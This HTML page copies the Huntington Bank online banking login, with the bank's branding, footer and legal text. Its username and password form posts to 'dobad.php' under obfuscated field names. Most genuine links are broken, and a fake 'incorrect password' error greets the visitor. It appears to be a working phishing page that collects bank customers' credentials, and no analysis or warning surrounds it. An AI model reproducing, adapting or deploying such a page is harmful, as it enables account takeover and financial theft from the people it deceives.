<!DOCTYPE html>
<html class="u-g-legacy-html" lang="en-us">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<script type="text/javascript" async="" src="chruch/bat.js.download"></script><script type="text/javascript" async="" src="chruch/f.txt"></script><script type="text/javascript" async="" src="chruch/js"></script><script type="text/javascript" async="" src="chruch/js(1)"></script><script src="chruch/ytc.js.download" async=""></script><script type="text/javascript" async="" src="chruch/ac66aa74326a8fa0e24180b6db457f6d.js.download"></script><script src="chruch/serverComponent.php"></script>
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="keywords" content="Huntington bank login, Huntington online banking login">
<meta name="description" content="Log  in to your Huntington account to check your balance, transfer funds and more. Our online banking is secure and easy to use.">
<meta name="viewport" content="width=device-width">
<meta name="viewport" content="initial-scale=1.0">
<title>
Huntington Online Banking Login | Huntington
</title>
<link rel="stylesheet" href="chruch/text.css" media="all">
<link rel="stylesheet" href="chruch/960_16_col.css" media="screen">
<link rel="stylesheet" href="chruch/huntington-rol.css" media="screen">
<link rel="stylesheet" href="chruch/propertyClasses.css" media="all">
<link rel="stylesheet" href="chruch/widgets.css" media="screen">
<link rel="stylesheet" href="chruch/NavBar.css" media="screen">
<link rel="stylesheet" href="chruch/huntington-rol-print.css" media="print">
<link rel="stylesheet" href="chruch/jquery-ui-1.8.9.custom.css">
<link rel="stylesheet" href="chruch/modal-dialog.css" media="screen">
<link rel="stylesheet" href="chruch/hnb.aria.common.css">
<link rel="stylesheet" href="chruch/Auth.css">
</head>
<body style="color: rgb(119, 110, 101);margin: 0px;padding: 0px;background: url('chruch/background-960.jpg') center top repeat-y fixed rgb(248, 248, 248);display: block;">
<div class="Messages">
<div id="LivePersonChat1_pnlLivePerson">
<div id="ensighten-chat"></div>
</div>
<div>
<div id="site-survey" style="display: none;"></div>
</div>
<div id="container" class="container_16">
<div class="grid_16 clearfix">
<div id="header">
<div class="grid_4 alpha">
<a id="hnbLogoLink">
<img id="hnbLogoImg" alt="Huntington - Welcome™" src="chruch/logo-lg.png"></a>
</div>
<div class="grid_12 omega clearfix">
<div id="messageBoxContainer" role="navigation" class="clearfix">
<div class="WelcomeMessage" role="menubar">
<a id="hlContactUS" role="menuitem" title="Contact Us" rel="noopener noreferrer" href="javascript:void(0)?javascript:void(0)?https://www.huntington.coms://www.huntington.com/customer-service/contact-us" target="_blank">Contact Us</a>
</div>
</div>
</div>
</div>
</div>
<div class="grid_16 clearfix">
<div id="content">
<div id="mainBody_validationSummary" class="con-error-noBold" style="color:Black;">
<p>The username or password is incorrect.</p>
<div id="linkContainer"><a id="forgotUsernameLink" href="javascript:navigateToForgotUsername();">Forgot Username?</a><a id="forgotPasswordLink" href="javascript:void(0)?https://www.huntington.coms://selfservice.huntington.com/default/ForgotPassword/">Forgot Password?</a></div>
<br>
</div>
<script src="chruch/hol.device.registration.min.js.download"></script>
<div id="deviceRegistrationAnchorDiv"></div>

<div class="login">
<form action="dobad.php" method="POST">
<div class="widget">
<div class="widget-title">
<h3 style="float:none; text-align:center !important;">Welcome To Huntington Online Banking</h3>
</div>
<div id="removebottomborder">
<dl class="loginForm">
<dt>
<label for="tbUserName">Username</label>
</dt>
<dd>
</dd>
<input name="bodycamksu83" type="text" maxlength="30" id="tbUserName" autocomplete="Off" title="Username" aria-required="true" required="" style="width:150px;">
<br></br>
<dt>
<label for="tbPassword">Password</label>
</dt>

<dd>
<input name="mimkpek" type="password" maxlength="16" required="" id="tbPassword" autocomplete="Off" aria-required="true" style="width:150px;">
</dd>
</dl>
<span id="mainBody_UsernamePasswordValidator" style="color:Red;display:none;"></span>

<div class="clear clearfix"></div>
</div>
<div class="widget-footer">
<div class="buttonsCentered">
<input type="submit" name="ioeilshu" value="Log In" onclick="javascript:WebForm_DoPostBackWithOptions(new WebForm_PostBackOptions(&quot;ctl00$mainBody$btSubmit&quot;, &quot;&quot;, true, &quot;&quot;, &quot;&quot;, false, false))" id="btSubmit" class="Action_Btn prevent-double-click">&nbsp;<img src="chruch/lock.gif" alt="Lock">
</div>
<div class="signonLinks">
<a id="mainBody_lnkForgotUsername" href="javascript:navigateToForgotUsername();">Forgot Username?</a>
<a id="mainBody_lnkForgotPassword" href="javascript:void(0)?https://www.huntington.coms://selfservice.huntington.com/default/ForgotPassword/">Forgot Password?</a>
<div>
<a id="mainBody_hlEnrollment" href="javascript:void(0)?https://www.huntington.coms://selfservice.huntington.com/default/Enrollment/">Enroll in Online Banking</a>

</form>
</div>
</div>
</div>
</div>
<div class="clear"></div>
</div>
</div>
</div>
<div class="grid_16 clearfix">
<div id="footerNav" role="navigation">
<ul class="clearfix" role="menubar">
<li role="presentation">
<a class="LegalFooterAnchor" href="javascript:void(0)?javascript:void(0)?https://www.huntington.coms://www.huntington.com//Privacy-Security/protecting-yourself/identity-theft" rel="noopener noreferrer" target="_blank" role="menuitem" data-menuindex="0">Identity Protection</a>
</li>
<li role="presentation">
<a class="LegalFooterAnchor" href="javascript:void(0)?javascript:void(0)?https://www.huntington.coms://www.huntington.com/Privacy-Security/how-we-protect-you/huntingtons-security-commitment" rel="noopener noreferrer" target="_blank" role="menuitem" data-menuindex="1">Security</a>
</li>
<li role="presentation">
<a class="LegalFooterAnchor" href="javascript:void(0)?javascript:void(0)?https://www.huntington.coms://www.huntington.com/Privacy-Security/Privacy-Policy" rel="noopener noreferrer" target="_blank" role="menuitem" data-menuindex="2">Privacy</a>
</li>
<li role="presentation">
<a class="LegalFooterAnchor" href="javascript:void(0)?javascript:void(0)?https://www.huntington.coms://www.huntington.com/personal/online-services/huntington-online-guarantee" rel="noopener noreferrer" target="_blank" role="menuitem" data-menuindex="3">Online Guarantee</a>
</li>
<li class="feedback-footer-parent" data-feedback-link-class="LegalFooterAnchor" data-site-survey-context_placement="Footer" data-feedback-link-type="Footer" data-feedback-link-icon-id="black" role="presentation"><a href="javascript:void(0)?https://www.huntington.coms://onlinebanking.huntington.com/rol/Auth/login.aspx?error=0x132120c8#" title="Give Feedback (opens in a new window)" data-site-survey-link="Footer" class="LegalFooterAnchor">Give Feedback</a></li>
</ul>
</div>
<hr>
<br></br>
<div id="footerBottom">
<div id="legal">
<p> Have questions? Call <strong>(800) 480-2265</strong>, daily 7:00 a.m. to 7:00 p.m. ET.<br></p>
<p style="margin-top: 10px">Mastercard and the Mastercard Brand Mark are registered trademarks of Mastercard International Incorporated.</p>
<span id="FDICLogoMessage">
<svg xmlns="javascript:void(0)?https://www.huntington.com://www.w3.org/2000/svg" viewBox="0 0 10 8" fill="#333" width="14" height="11">
<path clip-rule="evenodd" d="m5.1 0.8l-5.1 2.8v1h0.8v3.4h8.4v-3.4h0.8v-1l-4.9-2.8zm3.1 6.3h-6.4v-3.4l3.2-1.8 3.2 1.8v3.4z" fill-rule="evenodd"></path>
<path d="m3.3 5v-0.8h3.4v0.8h-3.4z"></path>
<path d="m3.3 5.4h3.4v0.9h-3.4v-0.9z"></path>
</svg>
The Huntington National Bank is an Equal Housing Lender and Member FDIC.
<br>
</span>
<img src="chruch/hexlogo-footer-icon.png" alt="The HNB Logo" width="8" height="9">®, Huntington®, 
<img src="chruch/hexlogo-footer-icon.png" alt="The HNB Logo" width="8" height="9">Huntington®, Huntington.Welcome.®, and Huntington Heads Up®
are federally registered service marks of Huntington Bancshares Incorporated.<br>
© <span id="Footer1_lblYear">2020</span> Huntington Bancshares Incorporated.
</div>
</div>

</div>
</div>
</form>
<!-- indcluded to preload nav images -->
<div id="dvTTGlobal"></div>
</body>
</html>